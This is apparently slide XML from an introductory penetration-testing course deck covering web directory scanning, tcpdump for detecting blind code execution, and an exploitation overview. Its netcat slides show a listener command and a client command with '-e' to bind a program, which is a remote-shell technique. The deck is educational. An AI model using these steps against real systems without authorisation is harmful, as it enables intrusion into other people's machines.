          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" err="1"/>
              <a:t>target.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1"/>
              <a:t>/admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE0AE8A6-BE18-3740-AD34-9013439CCF52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740819" y="3691314"/>
            <a:ext cx="2720929" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="46000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:alpha val="46000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4ADDB1B-5195-0D48-B510-9B2AF048ECF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740819" y="4722891"/>
            <a:ext cx="2720929" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="46000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF70053A-2FEC-B24D-8D3B-6025646BBCE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740819" y="5309227"/>
            <a:ext cx="2720929" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="18000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>secret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA7B086-1977-F845-99F2-92ACC5C02DCB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8740819" y="3119760"/>
            <a:ext cx="2720929" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:alpha val="18000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5F19E8-3CA6-DF42-8A5A-9796E62DE871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4793293" y="2537860"/>
            <a:ext cx="3549122" cy="1060355"/>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rgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checks for non-404 responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is recursive by default</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391954170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Scanning</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extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3085245027"/>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DCFB66BB-A57A-E64F-A156-B9C926422B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4793294" y="1157230"/>
            <a:ext cx="5611941" cy="4507846"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Packet sniffer! Great for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing blind remote code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debugging network issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [INTERFACE] [QUERY]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protcol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port [80, 443, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host [IP Address]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>net [Subnet]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tun0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and net 10.10.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55597967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9FC58D-3F35-1849-A5F9-EEF39A151384}"/>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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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38A14F-D9FC-F646-9086-E5746E023A84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="2546224"/>
            <a:ext cx="3448259" cy="3342747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Take advantage of discovered vulnerabilities and exploit them. Get shell on the target system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local and Remote File Inclusion (LFI/RFI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote Code Execution (RCE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password Attacks (Guessing and Cracking)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B76E1C03-2DE4-0544-8FDF-31BBD50BEF27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="6494" r="-1" b="2522"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654296" y="10"/>
            <a:ext cx="7537703" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281627780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extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3511994700"/>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949808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ontent Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67BFEEC4-803A-9E4A-98DF-ED7AE9C73C0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816269" y="1043427"/>
            <a:ext cx="6630231" cy="3342747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Socket Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”Swiss Army knife of hackers”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listener (server)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [PORT no]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Numeric, listener, verbose, port [port no]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [IP] [PORT]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can use –e to bind a program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A52CF4BB-F17D-8D4D-8921-8BD614F034D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1713598306"/>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85230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ontent Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67BFEEC4-803A-9E4A-98DF-ED7AE9C73C0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816270" y="1043427"/>
            <a:ext cx="4669792" cy="3342747"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Socket Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”Swiss Army knife of hackers”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listener (server)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nlvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [PORT no]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Numeric, listener, verbose, port [port no]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [IP] [PORT]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
